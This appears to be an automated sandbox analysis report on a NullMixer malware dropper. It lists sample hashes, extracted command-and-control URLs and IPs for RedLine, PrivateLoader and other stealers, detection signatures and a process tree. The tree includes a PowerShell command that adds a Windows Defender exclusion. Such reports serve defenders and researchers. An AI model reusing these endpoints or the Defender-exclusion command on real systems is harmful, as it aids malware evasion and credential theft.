Overview
overview
10Static
static
1001a53007f9...68.exe
windows7-x64
1001a53007f9...68.exe
windows10-2004-x64
10022e3c30a1...66.exe
windows7-x64
6022e3c30a1...66.exe
windows10-2004-x64
602ca2b5bb7...35.exe
windows7-x64
1002ca2b5bb7...35.exe
windows10-2004-x64
10setup_installer.exe
windows7-x64
10setup_installer.exe
windows10-2004-x64
100d69cafe70...cd.exe
windows7-x64
100d69cafe70...cd.exe
windows10-2004-x64
10setup_installer.exe
windows7-x64
10setup_installer.exe
windows10-2004-x64
100df647f0a2...bc.exe
windows7-x64
100df647f0a2...bc.exe
windows10-2004-x64
10setup_installer.exe
windows7-x64
10setup_installer.exe
windows10-2004-x64
101df367eead...2c.exe
windows7-x64
101df367eead...2c.exe
windows10-2004-x64
10setup_installer.exe
windows7-x64
10setup_installer.exe
windows10-2004-x64
101e083736ae...33.exe
windows7-x64
101e083736ae...33.exe
windows10-2004-x64
101e662d9025...7d.exe
windows7-x64
101e662d9025...7d.exe
windows10-2004-x64
102010009ff5...59.exe
windows7-x64
102010009ff5...59.exe
windows10-2004-x64
10243379992d...93.exe
windows7-x64
10243379992d...93.exe
windows10-2004-x64
102d63a14e4a...1a.exe
windows7-x64
102d63a14e4a...1a.exe
windows10-2004-x64
10setup_installer.exe
windows7-x64
10setup_installer.exe
windows10-2004-x64
10Analysis
-
max time kernel
149s -
max time network
166s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
04-11-2024 23:53
Behavioral task
behavioral1
Sample
01a53007f9b19d8ae4f12cc75bafcbef064f75d3a4b31b347b334a2d30558d68.exe
Resource
win7-20241010-en
Behavioral task
behavioral2
Sample
01a53007f9b19d8ae4f12cc75bafcbef064f75d3a4b31b347b334a2d30558d68.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral3
Sample
022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe
Resource
win7-20241010-en
Behavioral task
behavioral4
Sample
022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral5
Sample
02ca2b5bb774890c50950ad93becc2851bac8d04c35464dad4854088c5db4135.exe
Resource
win7-20241010-en
Behavioral task
behavioral6
Sample
02ca2b5bb774890c50950ad93becc2851bac8d04c35464dad4854088c5db4135.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral7
Sample
setup_installer.exe
Resource
win7-20240903-en
Behavioral task
behavioral8
Sample
setup_installer.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral9
Sample
0d69cafe700a952a621c9b5981504e30c939c3d6cc34452691fce67b2eb6c1cd.exe
Resource
win7-20240903-en
Behavioral task
behavioral10
Sample
0d69cafe700a952a621c9b5981504e30c939c3d6cc34452691fce67b2eb6c1cd.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral11
Sample
setup_installer.exe
Resource
win7-20240729-en
Behavioral task
behavioral12
Sample
setup_installer.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral13
Sample
0df647f0a2aa6c1aa1ec9426b9ef7c23eb6394f3ed29fbbdd0e9e228d24510bc.exe
Resource
win7-20240903-en
Behavioral task
behavioral14
Sample
0df647f0a2aa6c1aa1ec9426b9ef7c23eb6394f3ed29fbbdd0e9e228d24510bc.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral15
Sample
setup_installer.exe
Resource
win7-20241010-en
Behavioral task
behavioral16
Sample
setup_installer.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral17
Sample
1df367eead22695952cce5131891dfec5c479da37cb3dac0403015ebb785032c.exe
Resource
win7-20240903-en
Behavioral task
behavioral18
Sample
1df367eead22695952cce5131891dfec5c479da37cb3dac0403015ebb785032c.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral19
Sample
setup_installer.exe
Resource
win7-20240708-en
Behavioral task
behavioral20
Sample
setup_installer.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral21
Sample
1e083736aeca35b40f45693442d37466fa7b61ab36b2cebc2a49cb8c8492a433.exe
Resource
win7-20240903-en
Behavioral task
behavioral22
Sample
1e083736aeca35b40f45693442d37466fa7b61ab36b2cebc2a49cb8c8492a433.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral23
Sample
1e662d90254c17f35d76a81e33caff9c356d590244b00583c3bdb837a683607d.exe
Resource
win7-20240903-en
Behavioral task
behavioral24
Sample
1e662d90254c17f35d76a81e33caff9c356d590244b00583c3bdb837a683607d.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral25
Sample
2010009ff5b8b55fbcaa90318461a1b5b69ef6c8fd32ac279e81a10844d57859.exe
Resource
win7-20240729-en
Behavioral task
behavioral26
Sample
2010009ff5b8b55fbcaa90318461a1b5b69ef6c8fd32ac279e81a10844d57859.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral27
Sample
243379992d4692a9058e9964696513a2f84e03759c6d5b3b737685bf9bf65493.exe
Resource
win7-20241010-en
Behavioral task
behavioral28
Sample
243379992d4692a9058e9964696513a2f84e03759c6d5b3b737685bf9bf65493.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral29
Sample
2d63a14e4ab37be8d0eee3d87959e3a0ef972d07411c136ecf2f1ac4191a701a.exe
Resource
win7-20240903-en
Behavioral task
behavioral30
Sample
2d63a14e4ab37be8d0eee3d87959e3a0ef972d07411c136ecf2f1ac4191a701a.exe
Resource
win10v2004-20241007-en
General
-
Target
1e662d90254c17f35d76a81e33caff9c356d590244b00583c3bdb837a683607d.exe
-
Size
7.1MB
-
MD5
2b01f663d5244764e8c2d164d3345fd6
-
SHA1
2b0dfcc018a5da0f140352bd114fb0f5e9abdfc3
-
SHA256
1e662d90254c17f35d76a81e33caff9c356d590244b00583c3bdb837a683607d
-
SHA512
2c7dd219673800320e3432ff6d8d2e5c2c3ae60a5f5960097d16ff79f385186ce13a81ea5a2b3d17652161d55ea552712f73d2d154b377fa74ec10043469dab4
-
SSDEEP
196608:x1LUCg3xjX8jOOU62TdXIGVlgJZhNSJWSCumPm3B:xNdgVMjRD2TCWler32PB
Malware Config
Extracted
nullmixer
http://mooorni.xyz/
Extracted
privateloader
http://45.133.1.107/server.txt
pastebin.com/raw/A7dSG1te
http://wfsdragon.ru/api/setStats.php
51.178.186.149
Extracted
socelars
http://www.iyiqian.com/
http://www.hbgents.top/
http://www.rsnzhy.com/
http://www.znsjis.top/
Extracted
redline
fuck1
135.181.129.119:4805
-
auth_value
b69102cdbd4afe2d3159f88fb6dac731
Extracted
redline
media18
91.121.67.60:2151
-
auth_value
e37d5065561884bb54c8ed1baa6de446
Extracted
gcleaner
ppp-gl.biz
45.9.20.13
Signatures
-
Detect Fabookie payload 1 IoCs
resource yara_rule behavioral23/files/0x000500000001a4e2-91.dat family_fabookie -
Fabookie family
-
Gcleaner family
-
Nullmixer family
-
OnlyLogger
A tiny loader that uses IPLogger to get its payload.
-
Onlylogger family
-
PrivateLoader
PrivateLoader is a downloader sold as a pay-per-install malware distribution service.
-
Privateloader family
-
Raccoon Stealer V1 payload 1 IoCs
resource yara_rule behavioral23/memory/2860-239-0x0000000000400000-0x00000000016FB000-memory.dmp family_raccoon_v1 -
Raccoon family
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine payload 10 IoCs
resource yara_rule behavioral23/memory/2564-215-0x0000000000400000-0x0000000000422000-memory.dmp family_redline behavioral23/memory/2568-225-0x0000000000400000-0x0000000000422000-memory.dmp family_redline behavioral23/memory/2568-227-0x0000000000400000-0x0000000000422000-memory.dmp family_redline behavioral23/memory/2568-226-0x0000000000400000-0x0000000000422000-memory.dmp family_redline behavioral23/memory/2568-222-0x0000000000400000-0x0000000000422000-memory.dmp family_redline behavioral23/memory/2568-220-0x0000000000400000-0x0000000000422000-memory.dmp family_redline behavioral23/memory/2564-213-0x0000000000400000-0x0000000000422000-memory.dmp family_redline behavioral23/memory/2564-209-0x0000000000400000-0x0000000000422000-memory.dmp family_redline behavioral23/memory/2564-207-0x0000000000400000-0x0000000000422000-memory.dmp family_redline behavioral23/memory/2564-212-0x0000000000400000-0x0000000000422000-memory.dmp family_redline -
Redline family
-
SectopRAT payload 10 IoCs
resource yara_rule behavioral23/memory/2564-215-0x0000000000400000-0x0000000000422000-memory.dmp family_sectoprat behavioral23/memory/2568-225-0x0000000000400000-0x0000000000422000-memory.dmp family_sectoprat behavioral23/memory/2568-227-0x0000000000400000-0x0000000000422000-memory.dmp family_sectoprat behavioral23/memory/2568-226-0x0000000000400000-0x0000000000422000-memory.dmp family_sectoprat behavioral23/memory/2568-222-0x0000000000400000-0x0000000000422000-memory.dmp family_sectoprat behavioral23/memory/2568-220-0x0000000000400000-0x0000000000422000-memory.dmp family_sectoprat behavioral23/memory/2564-213-0x0000000000400000-0x0000000000422000-memory.dmp family_sectoprat behavioral23/memory/2564-209-0x0000000000400000-0x0000000000422000-memory.dmp family_sectoprat behavioral23/memory/2564-207-0x0000000000400000-0x0000000000422000-memory.dmp family_sectoprat behavioral23/memory/2564-212-0x0000000000400000-0x0000000000422000-memory.dmp family_sectoprat -
Sectoprat family
-
Socelars family
-
Socelars payload 1 IoCs
resource yara_rule behavioral23/files/0x000500000001a4f9-85.dat family_socelars -
Vidar family
-
OnlyLogger payload 1 IoCs
resource yara_rule behavioral23/memory/1152-240-0x0000000000400000-0x0000000002DBD000-memory.dmp family_onlylogger -
Vidar Stealer 1 IoCs
resource yara_rule behavioral23/memory/2248-243-0x0000000000400000-0x0000000002E10000-memory.dmp family_vidar -
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 2844 powershell.exe -
resource yara_rule behavioral23/files/0x000500000001a4c8-58.dat aspack_v212_v242 behavioral23/files/0x000500000001a4b9-59.dat aspack_v212_v242 behavioral23/files/0x000500000001a4d4-65.dat aspack_v212_v242 -
Executes dropped EXE 26 IoCs
pid Process 2752 setup_install.exe 2720 Mon2009d34d832dfd1d9.exe 2824 Mon20e7747f4ca9880.exe 2008 Mon200820e9da.exe 2860 Mon20b3dfc29da.exe 2516 Mon20c36d61c41847b17.exe 2312 Mon2024c1cb997.exe 768 Mon209df24d5e8f7.exe 2488 Mon20b09e42933548639.exe 2260 Mon200cb51003361.exe 1152 Mon2050daa466f6f.exe 2372 Mon203223fed8a4266c.exe 2140 Mon200cb51003361.tmp 1532 Mon206e4c938239.exe 1460 Mon204858e151.exe 2248 Mon2092b01a62c73.exe 956 Mon201cb4c63ce4.exe 292 Mon201629b9d021e.exe 276 Mon200cb51003361.exe 2756 Mon200cb51003361.tmp 3028 O5lIe.exE 2100 kPBhgOaGQk.exe 2788 Mon209df24d5e8f7.exe 2564 Mon206e4c938239.exe 2568 Mon204858e151.exe 2932 f782368.exe -
Loads dropped DLL 64 IoCs
pid Process 1952 1e662d90254c17f35d76a81e33caff9c356d590244b00583c3bdb837a683607d.exe 1952 1e662d90254c17f35d76a81e33caff9c356d590244b00583c3bdb837a683607d.exe 1952 1e662d90254c17f35d76a81e33caff9c356d590244b00583c3bdb837a683607d.exe 2752 setup_install.exe 2752 setup_install.exe 2752 setup_install.exe 2752 setup_install.exe 2752 setup_install.exe 2752 setup_install.exe 2752 setup_install.exe 2752 setup_install.exe 3008 cmd.exe 2028 cmd.exe 1996 cmd.exe 2028 cmd.exe 2332 cmd.exe 692 cmd.exe 2720 Mon2009d34d832dfd1d9.exe 2720 Mon2009d34d832dfd1d9.exe 692 cmd.exe 1992 cmd.exe 680 cmd.exe 2824 Mon20e7747f4ca9880.exe 2824 Mon20e7747f4ca9880.exe 2992 cmd.exe 2008 Mon200820e9da.exe 2008 Mon200820e9da.exe 2860 Mon20b3dfc29da.exe 2860 Mon20b3dfc29da.exe 1684 cmd.exe 2516 Mon20c36d61c41847b17.exe 2516 Mon20c36d61c41847b17.exe 2312 Mon2024c1cb997.exe 2312 Mon2024c1cb997.exe 768 Mon209df24d5e8f7.exe 768 Mon209df24d5e8f7.exe 1092 cmd.exe 1776 cmd.exe 1776 cmd.exe 2260 Mon200cb51003361.exe 2260 Mon200cb51003361.exe 2488 Mon20b09e42933548639.exe 2488 Mon20b09e42933548639.exe 1152 Mon2050daa466f6f.exe 1152 Mon2050daa466f6f.exe 2260 Mon200cb51003361.exe 2372 Mon203223fed8a4266c.exe 2372 Mon203223fed8a4266c.exe 1464 cmd.exe 1464 cmd.exe 980 cmd.exe 2688 cmd.exe 980 cmd.exe 2688 cmd.exe 1532 Mon206e4c938239.exe 1532 Mon206e4c938239.exe 1460 Mon204858e151.exe 1460 Mon204858e151.exe 2248 Mon2092b01a62c73.exe 2248 Mon2092b01a62c73.exe 2020 cmd.exe 2304 cmd.exe 956 Mon201cb4c63ce4.exe 956 Mon201cb4c63ce4.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Blocklisted process makes network request 6 IoCs
flow pid Process 60 1724 msiexec.exe 73 1724 msiexec.exe 82 1724 msiexec.exe 84 1724 msiexec.exe 86 1724 msiexec.exe 88 1724 msiexec.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 7 IoCs
flow ioc 41 pastebin.com 50 iplogger.org 51 iplogger.org 25 iplogger.org 26 iplogger.org 39 pastebin.com 40 pastebin.com -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 19 ip-api.com -
Looks up geolocation information via web service
Uses a legitimate geolocation service to find the infected system's geolocation info.
-
Suspicious use of SetThreadContext 3 IoCs
description pid Process procid_target PID 768 set thread context of 2788 768 Mon209df24d5e8f7.exe 85 PID 1532 set thread context of 2564 1532 Mon206e4c938239.exe 77 PID 1460 set thread context of 2568 1460 Mon204858e151.exe 78 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 4 IoCs
pid pid_target Process procid_target 1144 2008 WerFault.exe 55 2912 2752 WerFault.exe 31 1528 2248 WerFault.exe 64 1552 2932 WerFault.exe 112 -
System Location Discovery: System Language Discovery 1 TTPs 64 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Mon200cb51003361.tmp Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Mon203223fed8a4266c.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Mon200cb51003361.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language msiexec.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Mon20c36d61c41847b17.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Mon2024c1cb997.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Mon20e7747f4ca9880.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language msiexec.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Mon200cb51003361.tmp Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Mon204858e151.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Mon201cb4c63ce4.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Mon2050daa466f6f.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language kPBhgOaGQk.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 1e662d90254c17f35d76a81e33caff9c356d590244b00583c3bdb837a683607d.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Mon2009d34d832dfd1d9.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Mon206e4c938239.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Mon209df24d5e8f7.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Mon20b3dfc29da.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Mon206e4c938239.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language setup_install.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language O5lIe.exE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Mon2092b01a62c73.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Mon200cb51003361.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Mon20b09e42933548639.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Mon200820e9da.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Mon209df24d5e8f7.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Mon204858e151.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language f782368.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe -
Kills process with taskkill 3 IoCs
pid Process 2500 taskkill.exe 2712 taskkill.exe 952 taskkill.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Internet Explorer\Main mshta.exe Key created \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Internet Explorer\Main mshta.exe Key created \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Internet Explorer\Main mshta.exe -
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2844 powershell.exe -
Suspicious behavior: GetForegroundWindowSpam 2 IoCs
pid Process 2756 Mon200cb51003361.tmp 1152 Mon2050daa466f6f.exe -
Suspicious use of AdjustPrivilegeToken 39 IoCs
description pid Process Token: SeCreateTokenPrivilege 2516 Mon20c36d61c41847b17.exe Token: SeAssignPrimaryTokenPrivilege 2516 Mon20c36d61c41847b17.exe Token: SeLockMemoryPrivilege 2516 Mon20c36d61c41847b17.exe Token: SeIncreaseQuotaPrivilege 2516 Mon20c36d61c41847b17.exe Token: SeMachineAccountPrivilege 2516 Mon20c36d61c41847b17.exe Token: SeTcbPrivilege 2516 Mon20c36d61c41847b17.exe Token: SeSecurityPrivilege 2516 Mon20c36d61c41847b17.exe Token: SeTakeOwnershipPrivilege 2516 Mon20c36d61c41847b17.exe Token: SeLoadDriverPrivilege 2516 Mon20c36d61c41847b17.exe Token: SeSystemProfilePrivilege 2516 Mon20c36d61c41847b17.exe Token: SeSystemtimePrivilege 2516 Mon20c36d61c41847b17.exe Token: SeProfSingleProcessPrivilege 2516 Mon20c36d61c41847b17.exe Token: SeIncBasePriorityPrivilege 2516 Mon20c36d61c41847b17.exe Token: SeCreatePagefilePrivilege 2516 Mon20c36d61c41847b17.exe Token: SeCreatePermanentPrivilege 2516 Mon20c36d61c41847b17.exe Token: SeBackupPrivilege 2516 Mon20c36d61c41847b17.exe Token: SeRestorePrivilege 2516 Mon20c36d61c41847b17.exe Token: SeShutdownPrivilege 2516 Mon20c36d61c41847b17.exe Token: SeDebugPrivilege 2516 Mon20c36d61c41847b17.exe Token: SeAuditPrivilege 2516 Mon20c36d61c41847b17.exe Token: SeSystemEnvironmentPrivilege 2516 Mon20c36d61c41847b17.exe Token: SeChangeNotifyPrivilege 2516 Mon20c36d61c41847b17.exe Token: SeRemoteShutdownPrivilege 2516 Mon20c36d61c41847b17.exe Token: SeUndockPrivilege 2516 Mon20c36d61c41847b17.exe Token: SeSyncAgentPrivilege 2516 Mon20c36d61c41847b17.exe Token: SeEnableDelegationPrivilege 2516 Mon20c36d61c41847b17.exe Token: SeManageVolumePrivilege 2516 Mon20c36d61c41847b17.exe Token: SeImpersonatePrivilege 2516 Mon20c36d61c41847b17.exe Token: SeCreateGlobalPrivilege 2516 Mon20c36d61c41847b17.exe Token: 31 2516 Mon20c36d61c41847b17.exe Token: 32 2516 Mon20c36d61c41847b17.exe Token: 33 2516 Mon20c36d61c41847b17.exe Token: 34 2516 Mon20c36d61c41847b17.exe Token: 35 2516 Mon20c36d61c41847b17.exe Token: SeDebugPrivilege 2720 Mon2009d34d832dfd1d9.exe Token: SeDebugPrivilege 2844 powershell.exe Token: SeDebugPrivilege 2500 taskkill.exe Token: SeDebugPrivilege 2712 taskkill.exe Token: SeDebugPrivilege 952 taskkill.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1952 wrote to memory of 2752 1952 1e662d90254c17f35d76a81e33caff9c356d590244b00583c3bdb837a683607d.exe 31 PID 1952 wrote to memory of 2752 1952 1e662d90254c17f35d76a81e33caff9c356d590244b00583c3bdb837a683607d.exe 31 PID 1952 wrote to memory of 2752 1952 1e662d90254c17f35d76a81e33caff9c356d590244b00583c3bdb837a683607d.exe 31 PID 1952 wrote to memory of 2752 1952 1e662d90254c17f35d76a81e33caff9c356d590244b00583c3bdb837a683607d.exe 31 PID 1952 wrote to memory of 2752 1952 1e662d90254c17f35d76a81e33caff9c356d590244b00583c3bdb837a683607d.exe 31 PID 1952 wrote to memory of 2752 1952 1e662d90254c17f35d76a81e33caff9c356d590244b00583c3bdb837a683607d.exe 31 PID 1952 wrote to memory of 2752 1952 1e662d90254c17f35d76a81e33caff9c356d590244b00583c3bdb837a683607d.exe 31 PID 2752 wrote to memory of 2296 2752 setup_install.exe 33 PID 2752 wrote to memory of 2296 2752 setup_install.exe 33 PID 2752 wrote to memory of 2296 2752 setup_install.exe 33 PID 2752 wrote to memory of 2296 2752 setup_install.exe 33 PID 2752 wrote to memory of 2296 2752 setup_install.exe 33 PID 2752 wrote to memory of 2296 2752 setup_install.exe 33 PID 2752 wrote to memory of 2296 2752 setup_install.exe 33 PID 2752 wrote to memory of 2304 2752 setup_install.exe 34 PID 2752 wrote to memory of 2304 2752 setup_install.exe 34 PID 2752 wrote to memory of 2304 2752 setup_install.exe 34 PID 2752 wrote to memory of 2304 2752 setup_install.exe 34 PID 2752 wrote to memory of 2304 2752 setup_install.exe 34 PID 2752 wrote to memory of 2304 2752 setup_install.exe 34 PID 2752 wrote to memory of 2304 2752 setup_install.exe 34 PID 2752 wrote to memory of 2332 2752 setup_install.exe 35 PID 2752 wrote to memory of 2332 2752 setup_install.exe 35 PID 2752 wrote to memory of 2332 2752 setup_install.exe 35 PID 2752 wrote to memory of 2332 2752 setup_install.exe 35 PID 2752 wrote to memory of 2332 2752 setup_install.exe 35 PID 2752 wrote to memory of 2332 2752 setup_install.exe 35 PID 2752 wrote to memory of 2332 2752 setup_install.exe 35 PID 2752 wrote to memory of 680 2752 setup_install.exe 36 PID 2752 wrote to memory of 680 2752 setup_install.exe 36 PID 2752 wrote to memory of 680 2752 setup_install.exe 36 PID 2752 wrote to memory of 680 2752 setup_install.exe 36 PID 2752 wrote to memory of 680 2752 setup_install.exe 36 PID 2752 wrote to memory of 680 2752 setup_install.exe 36 PID 2752 wrote to memory of 680 2752 setup_install.exe 36 PID 2752 wrote to memory of 1092 2752 setup_install.exe 37 PID 2752 wrote to memory of 1092 2752 setup_install.exe 37 PID 2752 wrote to memory of 1092 2752 setup_install.exe 37 PID 2752 wrote to memory of 1092 2752 setup_install.exe 37 PID 2752 wrote to memory of 1092 2752 setup_install.exe 37 PID 2752 wrote to memory of 1092 2752 setup_install.exe 37 PID 2752 wrote to memory of 1092 2752 setup_install.exe 37 PID 2752 wrote to memory of 980 2752 setup_install.exe 38 PID 2752 wrote to memory of 980 2752 setup_install.exe 38 PID 2752 wrote to memory of 980 2752 setup_install.exe 38 PID 2752 wrote to memory of 980 2752 setup_install.exe 38 PID 2752 wrote to memory of 980 2752 setup_install.exe 38 PID 2752 wrote to memory of 980 2752 setup_install.exe 38 PID 2752 wrote to memory of 980 2752 setup_install.exe 38 PID 2752 wrote to memory of 2028 2752 setup_install.exe 39 PID 2752 wrote to memory of 2028 2752 setup_install.exe 39 PID 2752 wrote to memory of 2028 2752 setup_install.exe 39 PID 2752 wrote to memory of 2028 2752 setup_install.exe 39 PID 2752 wrote to memory of 2028 2752 setup_install.exe 39 PID 2752 wrote to memory of 2028 2752 setup_install.exe 39 PID 2752 wrote to memory of 2028 2752 setup_install.exe 39 PID 2752 wrote to memory of 1464 2752 setup_install.exe 40 PID 2752 wrote to memory of 1464 2752 setup_install.exe 40 PID 2752 wrote to memory of 1464 2752 setup_install.exe 40 PID 2752 wrote to memory of 1464 2752 setup_install.exe 40 PID 2752 wrote to memory of 1464 2752 setup_install.exe 40 PID 2752 wrote to memory of 1464 2752 setup_install.exe 40 PID 2752 wrote to memory of 1464 2752 setup_install.exe 40 PID 2752 wrote to memory of 1684 2752 setup_install.exe 41
Processes
-
C:\Users\Admin\AppData\Local\Temp\1e662d90254c17f35d76a81e33caff9c356d590244b00583c3bdb837a683607d.exe"C:\Users\Admin\AppData\Local\Temp\1e662d90254c17f35d76a81e33caff9c356d590244b00583c3bdb837a683607d.exe"1⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1952 -
C:\Users\Admin\AppData\Local\Temp\7zS0A7024F6\setup_install.exe"C:\Users\Admin\AppData\Local\Temp\7zS0A7024F6\setup_install.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2752 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"3⤵
- System Location Discovery: System Language Discovery
PID:2296 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"4⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
